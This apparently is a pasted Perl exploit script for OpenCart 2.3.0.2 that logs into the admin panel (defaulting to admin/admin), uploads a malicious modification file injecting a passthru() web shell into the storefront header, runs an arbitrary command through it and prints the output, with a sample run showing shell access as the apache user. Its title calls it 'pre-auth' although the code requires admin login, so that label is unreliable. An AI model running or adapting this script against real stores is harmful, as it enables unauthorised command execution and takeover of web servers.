· 6 years ago · Oct 04, 2019, 10:02 PM
1#!/usr/bin/perl -w
2#
3# Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
4#
5# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
6#
7#
8# # [test@localhost opencart]$ perl opencart_rce.pl http://192.168.1.1/oc2302/
9# # [
10# # [ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
11# # [ ==============================================================
12# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
13# # [
14# # [ Disclaimer:
15# # [ This or previous programs are for Educational purpose
16# # [ ONLY. Do not use it without permission. The usual
17# # [ disclaimer applies, especially the fact that Todor Donev
18# # [ is not liable for any damages caused by direct or
19# # [ indirect use of the information or functionality provided
20# # [ by these programs. The author or any Internet provider
21# # [ bears NO responsibility for content or misuse of these
22# # [ programs or any derivatives thereof. By using these programs
23# # [ you accept the fact that any damage (dataloss, system crash,
24# # [ system compromise, etc.) caused by the use of these programs
25# # [ are not Todor Donev's responsibility.
26# # [
27# # [ Use them at your own risk!
28# # [
29# # [ Initializing the browser
30# # [ Authorization..
31# # [ Initializing the payload
32# # [ Uploading the payload
33# # [ Exploiting..
34# # [ Cleaning the temp payload file
35# # [ ==============================================================
36# # uid=48(apache) gid=48(apache) groups=48(apache)
37# # [test@localhost opencart]$
38# #
39#
40#
41# https://www.owasp.org/index.php/Security_by_Design_Principles
42#
43#
44use strict;
45use JSON;
46use HTTP::Request;
47use HTTP::Request::Common;
48use LWP::UserAgent;
49use WWW::UserAgent::Random;
50use HTTP::CookieJar::LWP;
51$| = 1;
52my $host = shift || 'https://localhost/'; # Full path url to the store
53my $user = shift || 'admin';
54my $pass = shift || 'admin';
55my $cmd = shift || 'id';
56$cmd =~ s/\|/\;/g;
57print "[
58[ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
59[ ==============================================================
60[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
61[
62[ Disclaimer:
63[ This or previous programs are for Educational purpose
64[ ONLY. Do not use it without permission. The usual
65[ disclaimer applies, especially the fact that Todor Donev
66[ is not liable for any damages caused by direct or
67[ indirect use of the information or functionality provided
68[ by these programs. The author or any Internet provider
69[ bears NO responsibility for content or misuse of these
70[ programs or any derivatives thereof. By using these programs
71[ you accept the fact that any damage (dataloss, system crash,
72[ system compromise, etc.) caused by the use of these programs
73[ are not Todor Donev's responsibility.
74[
75[ Use them at your own risk!
76[
77";
78print "[ e.g. perl $0 https://target/ <username> <password> <command>\n" and exit if ($host !~ m/^http/);
79print "[ Initializing the browser\n";
80my $user_agent = rand_ua("browsers");
81my $jar = HTTP::CookieJar::LWP->new();
82my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
83 $browser->timeout(90);
84 $browser->cookie_jar($jar);
85 $browser->agent($user_agent);
86my $target = $host."admin/index.php?route=common/login";
87my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"username=$user&password=$pass&redirect=$target");
88print "[ Authorization..\n";
89# $request->authorization_basic('USERNAME', 'PASSWORD');
90my $content = $browser->request($request) or die "Exploit Failed: $!";
91print "[ 401 Unauthorized!\n" and exit if ($content->code eq '401');
92if (defined ($content->header('Location')) && ($content->header('Location') =~ m/token=(.*)/)){
93 my $token = $1;
94 my $rce_catch = $host."admin/index.php?route=extension/installer/upload";
95 print "[ Initializing the payload\n";
96 my $name;
97 for (0..18) { $name .= chr( int(rand(25) + 65) ); }
98 my $filename = $name.".ocmod.xml";
99 undef $name;
100
101my $payload = '<?xml version="1.0" encoding="utf-8"?>
102<modification>
103 <name><![CDATA['.$filename.']]></name>
104 <code><![CDATA['.$filename.']]></code>
105 <version>1.337</version>
106 <author></author>
107 <link></link>
108
109 <file path="catalog/controller/common/header.php">
110 <operation>
111 <search><![CDATA[// For page specific css]]></search>
112 <add position="before"><![CDATA[ if(isset($this->request->post[\'cmd\'])){
113 echo "0WNED";
114 $cmd = ($this->request->post[\'cmd\']);
115 passthru($cmd);
116 echo "0WNED";
117 $this->db->query("DELETE FROM `" . DB_PREFIX . "modification` WHERE `name` LIKE \''.$filename.'\'");
118 }]]></add>
119 </operation>
120 </file>
121</modification>
122';
123 open (TEMP, " > $ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
124 flock (TEMP, 2);
125 truncate (TEMP, 0);
126 seek (TEMP, 0, 0);
127 print (TEMP $payload);
128 close (TEMP);
129my $upload_payload = HTTP::Request::Common::POST($rce_catch."&token=".$token, Content_Type => 'form-data', Referer => $target, Content => [ file => ["$ENV{PWD}/$filename"]]);
130print "[ Uploading the payload\n";
131my $response = $browser->request($upload_payload) or die "[ Exploit Failed: $!";
132
133my $json = JSON->new->pretty;
134
135 my $json_object = $json->decode($response->content);
136
137print ("[ Exploit failed! You do not have permission to upload the payload.\n") and exit if ($json_object->{'error'});
138
139 print "[ Exploiting..\n";
140
141 for my $item( @{$json_object->{step}} ){
142 my $xml_inst_request = HTTP::Request->new (POST => $item->{url}, [Content_Type => "application/x-www-form-urlencoded", Referer => $host], "path=".$item->{path});
143 my $xml_inst_response = $browser->request($xml_inst_request) or die "[ Exploit Failed: $!";
144 print "[ Exploit failed.\n" and exit if ($xml_inst_response->code ne '200');
145 }
146 my $refresh_url = $host."admin/index.php?route=extension/modification/refresh&redir_inst=1&token=$token";
147 my $xml_refresh_request = HTTP::Request->new (GET => $refresh_url,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
148 $browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
149 my $exploiting = $host."index.php?route=common/home";
150 my $exploiting_request = HTTP::Request->new (POST => $exploiting,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"cmd=$cmd");
151 my $command_response = $browser->request($exploiting_request) or die "[ Exploit Failed: $!";
152 print "[ Cleaning the temp payload file\n";
153 unlink("$ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
154 if (($command_response->as_string() =~ m/0WNED(.*?)0WNED/gs) ne ''){
155 print "[ ==============================================================\n";
156 print $1;
157 } else {
158 print "[ ==============================================================\n";
159 print "[ Exploit failed: $cmd: command not found or isn't correct.\n";
160 }
161 $browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
162 exit;
163
164} else {
165 print "[ Exploit failed! You are not authorized. Wrong Username/Password.\n";
166 exit;
167}